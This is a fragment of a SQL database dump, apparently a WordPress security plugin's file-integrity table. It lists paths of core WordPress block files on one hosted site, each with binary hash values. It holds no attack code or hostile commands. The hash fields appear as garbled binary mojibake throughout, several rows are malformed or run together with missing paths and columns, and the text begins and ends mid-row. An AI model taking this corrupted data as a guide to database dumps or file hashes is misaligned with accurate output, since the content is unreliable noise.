5#A','A$x0<tI;bE$^jŹ','',0,'?'),('+bI=qY','wp-includes/blocks/freeform/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/freeform/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&+.l\r̔d','Ջ~4VKaNX%M6','',0,'?'),('gwߍhmA','wp-includes/blocks/freeform/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/freeform/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fAl5&#_HIjv',' \rRKS1NPKX+v6','',0,'?'),('VZ8=vc','wp-includes/blocks/freeform/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/freeform/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kNZmiį ','$X(u K]<;R','',0,'?'),('ZTD\r[FcLL','wp-includes/blocks/gallery/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')A̖]:IY','hY؅dF9^߾h\"Lj*zw:d ','',0,'?'),('7@r5 ','wp-includes/blocks/gallery/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I9#;y˿','ή5*pXO9t@~=4','',0,'?'),('tYSQ/[RC','wp-includes/blocks/gallery/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nո>|Wv9','W\\_Ͻ+cd\03Dl<=< 2A','',0,'?'),('UEKڂ*U','wp-includes/blocks/gallery/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I ]w/\r','zIȉO R3.gB7/sgk','',0,'?'),('|LF85n%|c!JZ=G','',0,'?'),('}A5 PԆ','wp-includes/blocks/gallery/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7ߕ龫}CccD','\r8RaS$)*f[','ϩzJ&O{|K ^֤0.1t','',0,'?'),('y\0Lz㶵 و','wp-includes/blocks/group/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4L`*A7\Zg','IlA2]OI_0i','',0,'?'),('x;_q*`<','wp-includes/blocks/group/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=>*f[','ϩzJ&O{|K ^֤0.1t','',0,'?'),('ϊYw׹EG','wp-includes/blocks/group/theme-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3jCOѺ}`xݰ','GCf0S\"hsp4YuR\Z$xqO','',0,'?'),('c-,Rqee\\','wp-includes/blocks/group/theme-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\ ʝ=fZ9U','\ri$y+h?j魾\Zb3sJ)','',0,'?'),('\"QOOPb','wp-includes/blocks/group/theme.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3jCOѺ}`xݰ','GCf0S\"hsp4YuR\Z$xqO','',0,'?'),('s$lAF-^','wp-includes/blocks/group/theme.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\ ʝ=fZ9U','\ri$y+h?j魾\Zb3sJ)','',0,'?'),(' IhBpO','wp-includes/blocks/heading/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/heading/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!A;ʢqLWD','b(Nvocw-ROP~i蒺<','',0,'?'),('g(355k(','wp-includes/blocks/heading/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/heading/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gj=bIg','BQ6bbDJt А^yYy ','',0,'?'),('zt[','wp-includes/blocks/heading/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/heading/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!<fK/l7','H3YF@&\'s+k}/','',0,'?'),('@)` ~O}ac','wp-includes/blocks/heading/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/heading/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gj=bIg','BQ6bbDJt А^yYy ','',0,'?'),('kV72+','wp-includes/blocks/heading/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/heading/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!<fK/l7','H3YF@&\'s+k}/','',0,'?'),('e2#^G','wp-includes/blocks/heading.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/heading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hu\Zt\ZK#>\0{','<8)JY$V2%rI&{=','',0,'?'),('m5)\'aH\r-','wp-includes/blocks/home-link/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/home-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5ΚL^vy[]',' Έq\n}fx%&]2Gnsz*','',0,'?'),(' 1\r{цnDeP]','wp-includes/blocks/home-link.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/home-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \'~ꓐfm',' ִO@1O@?K[ {','',0,'?'),('/\Z)y\r','wp-includes/blocks/html/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/html/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Q&j\'b','\'@ʉj7!^۸2{x\Zg','',0,'?'),('@뵰On','wp-includes/blocks/html/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/html/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|߸(o&>UDz','Y8h\0:+ qπ&OQH$','',0,'?'),('vV/W {}!^N','wp-includes/blocks/html/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/html/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T\rV@Bm','n1<^.Sۆrs?~N','',0,'?'),('7c-kЄ\"`k','wp-includes/blocks/html/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/html/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZuvDrzACj-rm.(o','',0,'?'),('\\/蝄Wn-\n 9','wp-includes/blocks/image/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tx`ğJK','G(1y sF1X=Hn8l<','',0,'?'),('ctשXپuyv','wp-includes/blocks/image/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W\Zi #hJ\r','њ֖rxvIʶ#B:n9#dm','',0,'?'),('9wv\r^!C','wp-includes/blocks/image/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-\n2aym','qDzWW/G66-r','',0,'?'),('F`M߸cN!','wp-includes/blocks/image/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɭB✆:\\ב\n ','nCB׺R d-Y˜8)','',0,'?'),('i%o)#\\','wp-includes/blocks/image/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u| \"tN','ah9H7C7k\n','',0,'?'),('ik[!gW}vȵ','wp-includes/blocks/image/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n櫝>N jg(t','=o1i[ޢAlEC','',0,'?'),('0[6/','',0,'?'),('u\Z ׀+>','wp-includes/blocks/image/view.js','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/view.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*Z3<Շ\r p!=','@y','wp-includes/blocks/latest-comments/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-comments/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>/\n({,\';۰','mV$3\n=ooV/Oo/','',0,'?'),('IUzYWg!g','wp-includes/blocks/latest-comments/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-comments/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'À]0','z]HKaa)2 $M','',0,'?'),('##Ցn\ndA\\e','wp-includes/blocks/latest-comments/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-comments/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^^%R on','^ՏIH )Ma','',0,'?'),('US\r Bc>\r ','wp-includes/blocks/latest-comments/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-comments/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ow]Sp?O','2֞>ܠ si1B^\rIP6w','',0,'?'),('Ŝ\0>j-','wp-includes/blocks/latest-comments/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-comments/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lt3Ta',')k','',0,'?'),(' gs)݅','wp-includes/blocks/latest-posts/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-posts/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O>ލ36SI.','\\3\rC2u]@~`d\0+2jVf԰+Gy5[1','',0,'?'),('KR wAe','wp-includes/blocks/latest-posts/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-posts/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\\$zQ `IL|N','J,+=(#a2Q<`K5Z','',0,'?'),('u>]\0aOlBb7','',0,'?'),('C,ڦR1A X','wp-includes/blocks/latest-posts/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-posts/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ODy$ @g&<','oZa&^D7*,9]m+}hnG[S4','',0,'?'),('eN-@1\Z','wp-includes/blocks/legacy-widget/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/legacy-widget/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t6@OP\0A','N>,cZ̝iDٺD%+','',0,'?'),(' `c@3vz','wp-includes/blocks/legacy-widget.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/legacy-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"Gknu.18|','Ug+(]{ !H>`O]!C~ꥋ7','',0,'?'),('P:vQw','wp-includes/blocks/list/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/list/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','؟q\nF\Z-a','\rmֺ0|$]dO2WgY(','',0,'?'),('S%ќ\"r!','wp-includes/blocks/list/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/list/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޱzl$L','8bc,lŨ%|M Xk}','',0,'?'),('I8߽T\Z0','wp-includes/blocks/list/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/list/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z.{:6`,tee','[x8ALlz8m9(\r\r\0,}N','',0,'?'),('q뻣D(j','wp-includes/blocks/list/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/list/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޱzl$L','8bc,lŨ%|M Xk}','',0,'?'),('w7v+q1\Z','wp-includes/blocks/list/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/list/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z.{:6`,tee','[x8ALlz8m9(\r\r\0,}N','',0,'?'),('P<hlRA','wp-includes/blocks/list-item/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/list-item/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(21uhUE!/\ruV','Iqn\\\\HhRiK}','',0,'?'),(')鷫g̨ R','wp-includes/blocks/loginout/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/loginout/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J\Z))6?','d\\#!%luL\\sP','',0,'?'),('LoA7e v ','wp-includes/blocks/loginout.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/loginout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' aG*qc:B{','KrMm8nJK>`A܅j','',0,'?'),('EX|T','wp-includes/blocks/media-text/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8\0%{','doy*ٿ)End[/Il\"','',0,'?'),('Rrr(ȟP','wp-includes/blocks/media-text/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ׂ}AM\\XL,0q4','ƪ)G W_eEC)WtYaw˸','',0,'?'),('rn` m$\0V','wp-includes/blocks/media-text/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h:=~C!<','R)xdwǚ)NIk\"eն|','',0,'?'),('ZQ+xr0','wp-includes/blocks/media-text/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FH}s(','ǁGǺ\Z} ','',0,'?'),(';nCg7$;_','wp-includes/blocks/media-text/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HVKa,q0D','\\UPV, {}Szc','',0,'?'),('4','wp-includes/blocks/media-text/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7n[f6j7;goex','[\n1Š,rv2P櫈`ag,X\\','',0,'?'),(')3\rr-ty','wp-includes/blocks/media-text/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˰egap','uΜ>؟Qt+ʨޝ_T\0(\\ ','',0,'?'),('_z9݀D:','wp-includes/blocks/media-text/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','->#0%+l373','}LT3E]~\\\"B$PE','',0,'?'),(':Y>=','wp-includes/blocks/media-text/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tGeF)ƫ-','^e3][gu[)ޟ1\0S r ','',0,'?'),('$n1U\\x(','wp-includes/blocks/missing/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/missing/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tڦ!S`bh6','QWN;&4!Q{5zId*7','',0,'?'),('XwE','wp-includes/blocks/more/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/more/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uu} .+:ur_','u#1׫^>~F\' X\\','',0,'?'),('Ȓ\"N=L.U','wp-includes/blocks/more/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/more/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w.,$#>','+穩T^3=@5_jzǼ[9+N.','',0,'?'),('EU-фM:','wp-includes/blocks/more/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/more/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zud','y*C6WՏ۳w/8:t','',0,'?'),('~C023*J','wp-includes/blocks/more/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/more/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w.,$#>','+穩T^3=@5_jzǼ[9+N.','',0,'?'),('y.{uJߠ5[\Z.','wp-includes/blocks/more/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/more/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zud','y*C6WՏ۳w/8:t','',0,'?'),('TO_רwEϧ\0 z\Z','wp-includes/blocks/navigation/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',31> 0QV','\"I(iqZKM50Dik8','',0,'?'),('vRz@7g*T','wp-includes/blocks/navigation/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#,R%_|dV','_omVD@T 5 EcET','',0,'?'),('MvU%Lҵm','wp-includes/blocks/navigation/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ơ<4gq4r{Hfi','U\\QfjUMAI%','',0,'?'),(' p(邊ȼa','wp-includes/blocks/navigation/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӹ=:-p0 ','Os>LA2Pv0luO','',0,'?'),('pAz1w','wp-includes/blocks/navigation/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z%O?4/T','W=ɔfmL\"ӄGgC','',0,'?'),('ăfHH','wp-includes/blocks/navigation/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[|va9','#93C_d$) qY(}f','',0,'?'),('agOIK1އ.\ngB','wp-includes/blocks/navigation/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*5qlR','fNK䣇t#t\n4],','',0,'?'),('v3S+7\rĠ9C{','wp-includes/blocks/navigation/view-modal.asset.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/view-modal.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G9ZLl<','}$gvFJUR*a\ZmX','',0,'?'),('A_e.阧\'B\\','wp-includes/blocks/navigation/view-modal.min.asset.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/view-modal.min.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9NR>.','/W\"\r_W@F|=','',0,'?'),('Sߙ\0cƕ`4','wp-includes/blocks/navigation/view.asset.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/view.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',A3fCu^:','|0b|9u{p遍','',0,'?'),('\\JRَnx','wp-includes/blocks/navigation/view.js','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/view.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fr~;իI0','2\n#XI,حU4lc +N\ZvX','',0,'?'),('9L>h9³k\"','wp-includes/blocks/navigation/view.min.asset.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/view.min.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ҒW)2^',']xOr8F7[x\"K>','',0,'?'),('jTctQ#','wp-includes/blocks/navigation/view.min.js','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/view.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':^;r(x','yiJ[KGúCƀ<.yA','',0,'?'),('cdcƚq~%','wp-includes/blocks/navigation-link/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%y3u1 \n','j|K\"v󇙟gDS\r6pR','',0,'?'),('\'haU\Zq`ug','wp-includes/blocks/navigation-link/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0wg\'','Jd$}e]cp&Hzo','',0,'?'),('\\{ԙUV','wp-includes/blocks/navigation-link/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6斱','@;c\"McZZ)#c-','',0,'?'),('8> \n!H','wp-includes/blocks/navigation-link/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$MtY_e[22M','\'|S4?K\n (&|','',0,'?'),('8W8ƨrdZ9','wp-includes/blocks/navigation-link/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9sD,J1d0,','TwfXXou ӂov','',0,'?'),('\0$XG-tUƹ','wp-includes/blocks/navigation-link/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','鴘V4Y*','O08sx0vi+\r=','',0,'?'),('6U*)u1@)\0P','wp-includes/blocks/navigation-link/style-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.ա;@ O ','}A5i{+36![?o','',0,'?'),('k^m\\','wp-includes/blocks/navigation-link/style.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','鴘V4Y*','O08sx0vi+\r=','',0,'?'),('w.( =','wp-includes/blocks/navigation-link/style.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.ա;@ O ','}A5i{+36![?o','',0,'?'),('V 덵Wky ','wp-includes/blocks/navigation-link.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','glfG͵_Y<','\"S&a\rbFa:;*9#RE','',0,'?'),('x7.D&ڹg','wp-includes/blocks/navigation-submenu/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-submenu/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4] TG7N','ggwc(36p_n','',0,'?'),('QoCP޶','wp-includes/blocks/navigation-submenu/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-submenu/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g̏~z',' ͡cGeFm]2a2j','',0,'?'),('8d$nxyŚ','wp-includes/blocks/navigation-submenu/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-submenu/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',QEg0lrF1','\\-HB]TWaEI1Kn','',0,'?'),('fmȄ%#!y\r','wp-includes/blocks/navigation-submenu/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-submenu/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#R_0Ck!','d?zH}v\n԰Ԯ.\0[','',0,'?'),('PLF^9R6zp','wp-includes/blocks/navigation-submenu/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-submenu/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Iw7 jGqm','%SxX,T`]y (XEG','',0,'?'),('qjO.CެИ}','wp-includes/blocks/navigation-submenu.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation-submenu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P_V߹+5F','Wzaô}mPJ̨˂ug@5\n$A','',0,'?'),('VW;z*(','wp-includes/blocks/navigation.php','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' &Yt >F','D񈹣Ϩ4u׹7Tkq9Bt e','',0,'?'),('s}Ƕ)TV','wp-includes/blocks/nextpage/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/nextpage/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%@S,fmwg','kn,8$7@&$dnTfR\Z26','',0,'?'),(' t]9\'','wp-includes/blocks/nextpage/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/nextpage/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ei@FF\Z','-!`,#ál៳DTD v8=Y5F','',0,'?'),('HAG|\"','wp-includes/blocks/nextpage/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/nextpage/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6Rc0t F0','XkW4xYĘH7ya','',0,'?'),('X-Of','wp-includes/blocks/nextpage/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/nextpage/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ei@FF\Z','-!`,#ál៳DTD v8=Y5F','',0,'?'),('W#:V^H3X','wp-includes/blocks/nextpage/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/nextpage/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6Rc0t F0','XkW4xYĘH7ya','',0,'?'),('Qx̿Py\'uE|','wp-includes/blocks/page-list/block.json','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hnƚmu','zz0i;1T$Isڴms9\" (','',0,'?'),('/e\no?}mbK','wp-includes/blocks/page-list/editor-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\rp ^^ ','\Zy\"#OO~@;,l','',0,'?'),('<|q|xܲ\\zZ{','wp-includes/blocks/page-list/editor-rtl.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bIhPvi','컽\nr\"*\"BC%M\'Q','',0,'?'),('}/ pS','wp-includes/blocks/page-list/editor.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WY F','=.bT6V9sN}9/%Bu7U','',0,'?'),('t~*ֆ','wp-includes/blocks/page-list/editor.min.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iX,','1LeVurJ۔ p','',0,'?'),(')\'hL휞\rЀ^','wp-includes/blocks/page-list/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-includes/blocks/page-list/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8 x vR<','II|{8ʰ$Ni0<&[vHV^','',0,'?'),('\\Дhc 